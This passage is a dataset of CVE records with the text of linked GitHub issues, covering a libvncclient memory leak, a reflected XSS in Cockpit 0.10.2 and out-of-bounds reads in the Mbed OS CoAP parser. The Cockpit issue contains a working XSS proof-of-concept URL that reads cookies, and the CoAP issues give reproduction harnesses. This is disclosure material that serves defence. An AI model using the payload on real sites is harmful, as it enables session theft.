"9596C8CD-B03F-4E9D-82AB-0986FDD1B47C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:siemens:simatic_itc1500_pro_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "CD78291E-48D8-4718-AE14-BDF93BD557D7", "versionEndExcluding": "3.2.1.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "3.0.0.0", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:siemens:simatic_itc1500_pro:-:*:*:*:*:*:*:*", "matchCriteriaId": "5BB898D3-07A3-42A1-8F1B-53C3B005982D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:siemens:simatic_itc1900_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "AD1209DE-2724-493D-8276-1BE959BFE6BF", "versionEndExcluding": "3.2.1.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "3.0.0.0", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:siemens:simatic_itc1900:-:*:*:*:*:*:*:*", "matchCriteriaId": "6A9143A6-A93A-45CA-8A1F-6EE30647B54A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:siemens:simatic_itc1900_pro_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "92F7FC17-F19F-4BD6-9704-49B67D22B532", "versionEndExcluding": "3.2.1.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "3.0.0.0", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:siemens:simatic_itc1900_pro:-:*:*:*:*:*:*:*", "matchCriteriaId": "3D34BD13-4E71-48A2-851D-AE7CE2A03C28", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:siemens:simatic_itc2200_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "FE4A6F13-385B-4A13-B8D8-3BBC4E9D5B67", "versionEndExcluding": "3.2.1.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "3.0.0.0", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:siemens:simatic_itc2200:-:*:*:*:*:*:*:*", "matchCriteriaId": "3E63E423-7450-4043-B33B-3FFF5BBE1CB2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:siemens:simatic_itc2200_pro_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "71A51CA4-1A62-47BC-99A3-4DC9F3986FF5", "versionEndExcluding": "3.2.1.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "3.0.0.0", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:siemens:simatic_itc2200_pro:-:*:*:*:*:*:*:*", "matchCriteriaId": "CD278558-AB0E-4FC1-9E5B-6B57D29CB86A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:opensuse:leap:15.2:*:*:*:*:*:*:*", "matchCriteriaId": "B009C22E-30A4-4288-BCF6-C3E81DEAF45A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "909" ]
909
https://github.com/LibVNC/libvncserver/issues/253
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "LibVNC", "libvncserver" ]
ConnectToRFBRepeater https://github.com/LibVNC/libvncserver/blob/79516a6aa3e875c8d9f4c83667076aa070fe5d6e/libvncclient/rfbproto.c#L401 function leaks memory, because `tmphost` buffer is filled by using `snprintf` function, but after buffer is being sent back to client using `WriteToRFBServer(client, tmphost, sizeof(tmphost))`, which sent the whole `tmphost` buffer including its uninitialized part, which would expose uninitialized memory of client application. Example file `examples/repeater.c` contains same kind of vulnerability as well. This security issue is a result of my work at Kaspersky Lab ICS CERT Vulnerability Research Group at position of Security Researcher. For more information about ICS CERT please contact: ics-cert@kaspersky.com https://ics-cert.kaspersky.com/ Best regards, Pavel Cheremushkin
SECURITY: memory leak in libvncclient in ConnectToRFBRepeater function
https://api.github.com/repos/LibVNC/libvncserver/issues/253/comments
0
2018-09-11T15:29:14Z
2018-09-29T18:55:31Z
https://github.com/LibVNC/libvncserver/issues/253
359,100,627
253
1,288
CVE-2020-14408
2020-06-17T20:15:10.117
An issue was discovered in Agentejo Cockpit 0.10.2. Insufficient sanitization of the to parameter in the /auth/login route allows for injection of arbitrary JavaScript code into a web page's content, creating a Reflected XSS attack vector.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/agentejo/cockpit/issues/1310" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/agentejo/cockpit/issues/1310" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:agentejo:cockpit:0.10.2:*:*:*:*:*:*:*", "matchCriteriaId": "F4251B1B-6FD9-4351-BD19-1EC433B1BE8E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/agentejo/cockpit/issues/1310
[ "Exploit", "Third Party Advisory" ]
github.com
[ "agentejo", "cockpit" ]
Insufficient sanitization of `to` parameter in `/auth/login` route allows for injection of arbitrary JavaScript code into webpage content creating a reflected XSS attack vector. See below POC : ``` https://cms.hosted.com/auth/login?to=/92874%27;alert(%27reflected%20xss!\ncookie:%20%27%2bdocument.cookie)//280 ```
Reflected XSS in login panel
https://api.github.com/repos/agentejo/cockpit/issues/1310/comments
0
2020-06-17T11:03:12Z
2020-06-17T12:01:46Z
https://github.com/agentejo/cockpit/issues/1310
640,351,730
1,310
1,289
CVE-2020-12883
2020-06-18T19:15:09.893
Buffer over-reads were discovered in the CoAP library in Arm Mbed OS 5.15.3. The CoAP parser is responsible for parsing received CoAP packets. The function sn_coap_parser_options_parse() parses CoAP input linearly using a while loop. Once an option is parsed in a loop, the current point (*packet_data_pptr) is increased correspondingly. The pointer is restricted by the size of the received buffer, as well as by the option delta and option length bytes. The actual input packet length is not verified against the number of bytes read when processing the option extended delta and the option extended length. Moreover, the calculation of the message_left variable, in the case of non-extended option deltas, is incorrect and indicates more data left for processing than provided in the function input. All of these lead to heap-based or stack-based memory location read access that is outside of the intended boundary of the buffer. Depending on the platform-specific memory management mechanisms, it can lead to processing of unintended inputs or system memory access violation errors.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ARMmbed/mbed-coap/pull/116" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ARMmbed/mbed-os/issues/12925" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ARMmbed/mbed-os/issues/12926" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ARMmbed/mbed-os/issues/12927" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ARMmbed/mbed-coap/pull/116" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ARMmbed/mbed-os/issues/12925" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ARMmbed/mbed-os/issues/12926" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ARMmbed/mbed-os/issues/12927" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:arm:mbed_os:5.15.3:*:*:*:*:*:*:*", "matchCriteriaId": "B314FCEF-12B7-4510-AC5E-12D3574E3E68", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/ARMmbed/mbed-os/issues/12925
[ "Third Party Advisory" ]
github.com
[ "ARMmbed", "mbed-os" ]
### Description of defect **References:** https://github.com/ARMmbed/mbed-os/tree/mbed-os-5.15.3/features/frameworks/mbed-coap https://github.com/ARMmbed/mbed-coap/tree/v5.1.5 **File:** [sn_coap_parser.c](https://github.com/ARMmbed/mbed-os/blob/b6370b4c37f3d4665ed1cdcb1afea85396bba1b3/features/frameworks/mbed-coap/source/sn_coap_parser.c) ``` Example Trace: #0 sn_coap_parser_options_parse_uint() sn_coap_parser.c:257 #1 sn_coap_parser_options_parse() sn_coap_parser.c:531 #2 sn_coap_parser() sn_coap_parser.c:161 ``` **Analysis:** If a packet with option delta lower than 13 is parsed, the remaning message length is incorrectly calculated in the line: https://github.com/ARMmbed/mbed-os/blob/b6370b4c37f3d4665ed1cdcb1afea85396bba1b3/features/frameworks/mbed-coap/source/sn_coap_parser.c#L329 The packet data pointer is not incremented prior to the remaining message length calculation and therefore it does not account for the option byte. This allows a malformed message with not option value following to pass through message length check in the line: https://github.com/ARMmbed/mbed-os/blob/b6370b4c37f3d4665ed1cdcb1afea85396bba1b3/features/frameworks/mbed-coap/source/sn_coap_parser.c#L331-L335 For short options length the remaining message length is unchanged after option lengh processing: https://github.com/ARMmbed/mbed-os/blob/b6370b4c37f3d4665ed1cdcb1afea85396bba1b3/features/frameworks/mbed-coap/source/sn_coap_parser.c#L361 Allowing to pass throught final message length check: https://github.com/ARMmbed/mbed-os/blob/b6370b4c37f3d4665ed1cdcb1afea85396bba1b3/features/frameworks/mbed-coap/source/sn_coap_parser.c#L391-L395 In option processing code the packet data pointer is incremented beyond the input buffer boundary and passed for further processing, e.g. in: https://github.com/ARMmbed/mbed-os/blob/b6370b4c37f3d4665ed1cdcb1afea85396bba1b3/features/frameworks/mbed-coap/source/sn_coap_parser.c#L529 The invalid pointer is then accessed by functions called from option processing code, e.g. in: https://github.com/ARMmbed/mbed-os/blob/b6370b4c37f3d4665ed1cdcb1afea85396bba1b3/features/frameworks/mbed-coap/source/sn_coap_parser.c#L257 **Type:** - Integer Overflow or Wraparound - Out-of-bounds Read **Result:** - Parsing data out of input bounds - Possible crash due out-of-bound memory access #### Target(s) affected by this defect ? - MbedOS mbed-coap library 5.1.5 - MbedOS 5.15.3 #### Toolchain(s) (name and version) displaying this defect ? N/A #### What version of Mbed-os are you using (tag or sha) ? MbedOS 5.15.3 #### What version(s) of tools are you using. List all that apply (E.g. mbed-cli) N/A #### How is this defect reproduced ? Parsing the provided input example input with sn_coap_parser() function. ```c #include <stdint.h> #include <stdlib.h> #include <stdio.h> #include "sn_coap_protocol.h" #include "sn_coap_header.h" struct coap_s* coapHandle; coap_version_e coapVersion = COAP_VERSION_1; void* coap_malloc(uint16_t size){ return malloc(size); } void coap_free(void* addr){ free(addr); } uint8_t coap_tx_cb(uint8_t *arg_a, uint16_t arg_b, sn_nsdl_addr_s *arg_c, void *arg_d){ return 0; } int8_t coap_rx_cb(sn_coap_hdr_s *arg_a, sn_nsdl_addr_s *arg_b, void *arg_c){ return 0; } int main(int argc, const char* argv[]) { FILE *fp; size_t read_bytes; size_t input_size; uint8_t *message_buffer; if (argc != 2) { return 1; } fp = fopen(argv[1], "r"); if (fp == NULL) { return 2; } fseek (fp , 0 , SEEK_END); input_size = ftell(fp); rewind (fp); if (input_size > 65527) { return 3; } message_buffer = malloc(input_size); read_bytes = fread(message_buffer, 1, input_size, fp); fclose(fp); coapHandle = sn_coap_protocol_init(&coap_malloc, &coap_free, &coap_tx_cb, &coap_rx_cb); sn_coap_hdr_s* parsed = sn_coap_parser(coapHandle, read_bytes, message_buffer, &coapVersion); sn_coap_parser_release_allocated_coap_msg_mem(coapHandle, parsed); free(message_buffer); return 0; } ``` [sn_coap_parser.c:257__read_buffer_overflow.log](https://github.com/ARMmbed/mbed-os/files/4583581/sn_coap_parser.c.257__read_buffer_overflow.log)
Out of range memory access in MbedOS CoAP library parser
https://api.github.com/repos/ARMmbed/mbed-os/issues/12925/comments
3
2020-05-05T20:59:22Z
2020-07-02T09:31:16Z
https://github.com/ARMmbed/mbed-os/issues/12925
612,891,401
12,925
1,290
CVE-2020-12883
2020-06-18T19:15:09.893
Buffer over-reads were discovered in the CoAP library in Arm Mbed OS 5.15.3. The CoAP parser is responsible for parsing received CoAP packets. The function sn_coap_parser_options_parse() parses CoAP input linearly using a while loop. Once an option is parsed in a loop, the current point (*packet_data_pptr) is increased correspondingly. The pointer is restricted by the size of the received buffer, as well as by the option delta and option length bytes. The actual input packet length is not verified against the number of bytes read when processing the option extended delta and the option extended length. Moreover, the calculation of the message_left variable, in the case of non-extended option deltas, is incorrect and indicates more data left for processing than provided in the function input. All of these lead to heap-based or stack-based memory location read access that is outside of the intended boundary of the buffer. Depending on the platform-specific memory management mechanisms, it can lead to processing of unintended inputs or system memory access violation errors.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ARMmbed/mbed-coap/pull/116" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ARMmbed/mbed-os/issues/12925" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ARMmbed/mbed-os/issues/12926" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ARMmbed/mbed-os/issues/12927" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ARMmbed/mbed-coap/pull/116" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ARMmbed/mbed-os/issues/12925" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ARMmbed/mbed-os/issues/12926" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ARMmbed/mbed-os/issues/12927" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:arm:mbed_os:5.15.3:*:*:*:*:*:*:*", "matchCriteriaId": "B314FCEF-12B7-4510-AC5E-12D3574E3E68", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/ARMmbed/mbed-os/issues/12926
[ "Third Party Advisory" ]
github.com
[ "ARMmbed", "mbed-os" ]
### Description of defect **References:** https://github.com/ARMmbed/mbed-os/tree/mbed-os-5.15.3/features/frameworks/mbed-coap https://github.com/ARMmbed/mbed-coap/tree/v5.1.5 **File:** [sn_coap_parser.c](https://github.com/ARMmbed/mbed-os/blob/b6370b4c37f3d4665ed1cdcb1afea85396bba1b3/features/frameworks/mbed-coap/source/sn_coap_parser.c) ``` Example Traces: #0 sn_coap_parser_options_parse() sn_coap_parser.c:310 #1 sn_coap_parser() sn_coap_parser.c:161 #0 sn_coap_parser_options_parse() sn_coap_parser.c:314 #1 sn_coap_parser() sn_coap_parser.c:161 ``` **Analysis:** If a packet with option delta equal to 13 or 14 is parsed with no extended option delta following, access beyond the packet data buffer is made due to insufficient message length checks: https://github.com/ARMmbed/mbed-os/blob/b6370b4c37f3d4665ed1cdcb1afea85396bba1b3/features/frameworks/mbed-coap/source/sn_coap_parser.c#L309-L322 Before option number processing the message left bytes is calculated including the option delta/option length byte: https://github.com/ARMmbed/mbed-os/blob/b6370b4c37f3d4665ed1cdcb1afea85396bba1b3/features/frameworks/mbed-coap/source/sn_coap_parser.c#L298 In case of option delta set to 13, the extended delta byte is accessed in the following line without prior check for buffer out-of-bound index: https://github.com/ARMmbed/mbed-os/blob/b6370b4c37f3d4665ed1cdcb1afea85396bba1b3/features/frameworks/mbed-coap/source/sn_coap_parser.c#L310 In case of option delta set to 14, the extended delta bytes are accessed with insufficient index check. As the message_left variable includes the option delta byte, the check will pass malformed frame if there is only one extended delta byte following: https://github.com/ARMmbed/mbed-os/blob/b6370b4c37f3d4665ed1cdcb1afea85396bba1b3/features/frameworks/mbed-coap/source/sn_coap_parser.c#L312-L315 **Type:** - Integer Overflow or Wraparound - Out-of-bounds Read **Result:** - Parsing data out of input bounds - Possible crash due out-of-bound memory access #### Target(s) affected by this defect ? - MbedOS mbed-coap library 5.1.5 - MbedOS 5.15.3 #### Toolchain(s) (name and version) displaying this defect ? N/A #### What version of Mbed-os are you using (tag or sha) ? MbedOS 5.15.3 #### What version(s) of tools are you using. List all that apply (E.g. mbed-cli) N/A #### How is this defect reproduced ? Parsing the provided input example input with sn_coap_parser() function. ```c #include <stdint.h> #include <stdlib.h> #include <stdio.h> #include "sn_coap_protocol.h" #include "sn_coap_header.h" struct coap_s* coapHandle; coap_version_e coapVersion = COAP_VERSION_1; void* coap_malloc(uint16_t size){ return malloc(size); } void coap_free(void* addr){ free(addr); } uint8_t coap_tx_cb(uint8_t *arg_a, uint16_t arg_b, sn_nsdl_addr_s *arg_c, void *arg_d){ return 0; } int8_t coap_rx_cb(sn_coap_hdr_s *arg_a, sn_nsdl_addr_s *arg_b, void *arg_c){ return 0; } int main(int argc, const char* argv[]) { FILE *fp; size_t read_bytes; size_t input_size; uint8_t *message_buffer; if (argc != 2) { return 1; } fp = fopen(argv[1], "r"); if (fp == NULL) { return 2; } fseek (fp , 0 , SEEK_END); input_size = ftell(fp); rewind (fp); if (input_size > 65527) { return 3; } message_buffer = malloc(input_size); read_bytes = fread(message_buffer, 1, input_size, fp); fclose(fp); coapHandle = sn_coap_protocol_init(&coap_malloc, &coap_free, &coap_tx_cb, &coap_rx_cb); sn_coap_hdr_s* parsed = sn_coap_parser(coapHandle, read_bytes, message_buffer, &coapVersion); sn_coap_parser_release_allocated_coap_msg_mem(coapHandle, parsed); free(message_buffer); return 0; } ``` [sn_coap_parser.c:310__read_buffer_overflow_minimal.log](https://github.com/ARMmbed/mbed-os/files/4583591/sn_coap_parser.c.310__read_buffer_overflow_minimal.log) [sn_coap_parser.c:314__read_buffer_overflow_minimal.log](https://github.com/ARMmbed/mbed-os/files/4583592/sn_coap_parser.c.314__read_buffer_overflow_minimal.log)
Out of range memory access in MbedOS CoAP library parser - option number
https://api.github.com/repos/ARMmbed/mbed-os/issues/12926/comments
2
2020-05-05T21:02:26Z
2020-11-04T17:41:49Z
https://github.com/ARMmbed/mbed-os/issues/12926
612,893,067
12,926
1,291
CVE-2020-12883
2020-06-18T19:15:09.893
Buffer over-reads were discovered in the CoAP library in Arm Mbed OS 5.15.3. The CoAP parser is responsible for parsing received CoAP packets. The function sn_coap_parser_options_parse() parses CoAP input linearly using a while loop. Once an option is parsed in a loop, the current point (*packet_data_pptr) is increased correspondingly. The pointer is restricted by the size of the received buffer, as well as by the option delta and option length bytes. The actual input packet length is not verified against the number of bytes read when processing the option extended delta and the option extended length. Moreover, the calculation of the message_left variable, in the case of non-extended option deltas, is incorrect and indicates more data left for processing than provided in the function input. All of these lead to heap-based or stack-based memory location read access that is outside of the intended boundary of the buffer. Depending on the platform-specific memory management mechanisms, it can lead to processing of unintended inputs or system memory access violation errors.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ARMmbed/mbed-coap/pull/116" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ARMmbed/mbed-os/issues/12925" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ARMmbed/mbed-os/issues/12926" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ARMmbed/mbed-os/issues/12927" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ARMmbed/mbed-coap/pull/116" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ARMmbed/mbed-os/issues/12925" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ARMmbed/mbed-os/issues/12926" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ARMmbed/mbed-os/issues/12927" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:arm:mbed_os:5.15.3:*:*:*:*:*:*:*", "matchCriteriaId": "B314FCEF-12B7-4510-AC5E-12D3574E3E68", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/ARMmbed/mbed-os/issues/12927
[ "Third Party Advisory" ]
github.com
[ "ARMmbed", "mbed-os" ]
### Description of defect **References:** https://github.com/ARMmbed/mbed-os/tree/mbed-os-5.15.3/features/frameworks/mbed-coap https://github.com/ARMmbed/mbed-coap/tree/v5.1.5 **File:** [sn_coap_parser.c](https://github.com/ARMmbed/mbed-os/blob/b6370b4c37f3d4665ed1cdcb1afea85396bba1b3/features/frameworks/mbed-coap/source/sn_coap_parser.c) ``` Example Traces: #0 sn_coap_parser_options_parse() sn_coap_parser.c:342 #1 sn_coap_parser() sn_coap_parser.c:161 #0 sn_coap_parser_options_parse() sn_coap_parser.c:346 #1 sn_coap_parser() sn_coap_parser.c:161 ``` **Analysis:** If a packet with option length equal to 13 or 14 is set with no extended option length following, access beyond the provided packet buffer is made due to insufficient message length checks: https://github.com/ARMmbed/mbed-os/blob/b6370b4c37f3d4665ed1cdcb1afea85396bba1b3/features/frameworks/mbed-coap/source/sn_coap_parser.c#L341-L354 Before option length processing the message left bytes is calculated including the option delta/option length byte: https://github.com/ARMmbed/mbed-os/blob/b6370b4c37f3d4665ed1cdcb1afea85396bba1b3/features/frameworks/mbed-coap/source/sn_coap_parser.c#L329 In case of option length set to 13, the extended delta length is accessed in the following line without prior check for buffer out-of-bound condition: https://github.com/ARMmbed/mbed-os/blob/b6370b4c37f3d4665ed1cdcb1afea85396bba1b3/features/frameworks/mbed-coap/source/sn_coap_parser.c#L343 In case of option length set to 14, the extended length bytes are accessed with insufficient out-of-boudnds condition checks. As the message_left variable includes the option length byte, the check will pass malformed frame if there is only one extended length byte following: https://github.com/ARMmbed/mbed-os/blob/b6370b4c37f3d4665ed1cdcb1afea85396bba1b3/features/frameworks/mbed-coap/source/sn_coap_parser.c#L345-L348 **Type:** - Integer Overflow or Wraparound - Out-of-bounds Read **Result:** - Parsing data out of input bounds - Possible crash due out-of-bound memory access #### Target(s) affected by this defect ? - MbedOS mbed-coap library 5.1.5 - MbedOS 5.15.3 #### Toolchain(s) (name and version) displaying this defect ? N/A #### What version of Mbed-os are you using (tag or sha) ? MbedOS 5.15.3 #### What version(s) of tools are you using. List all that apply (E.g. mbed-cli) N/A #### How is this defect reproduced ? Parsing the provided input example input with sn_coap_parser() function. ```c #include <stdint.h> #include <stdlib.h> #include <stdio.h> #include "sn_coap_protocol.h" #include "sn_coap_header.h" struct coap_s* coapHandle; coap_version_e coapVersion = COAP_VERSION_1; void* coap_malloc(uint16_t size){ return malloc(size); } void coap_free(void* addr){ free(addr); } uint8_t coap_tx_cb(uint8_t *arg_a, uint16_t arg_b, sn_nsdl_addr_s *arg_c, void *arg_d){ return 0; } int8_t coap_rx_cb(sn_coap_hdr_s *arg_a, sn_nsdl_addr_s *arg_b, void *arg_c){ return 0; } int main(int argc, const char* argv[]) { FILE *fp; size_t read_bytes; size_t input_size; uint8_t *message_buffer; if (argc != 2) { return 1; } fp = fopen(argv[1], "r"); if (fp == NULL) { return 2; } fseek (fp , 0 , SEEK_END); input_size = ftell(fp); rewind (fp); if (input_size > 65527) { return 3; } message_buffer = malloc(input_size); read_bytes = fread(message_buffer, 1, input_size, fp); fclose(fp); coapHandle = 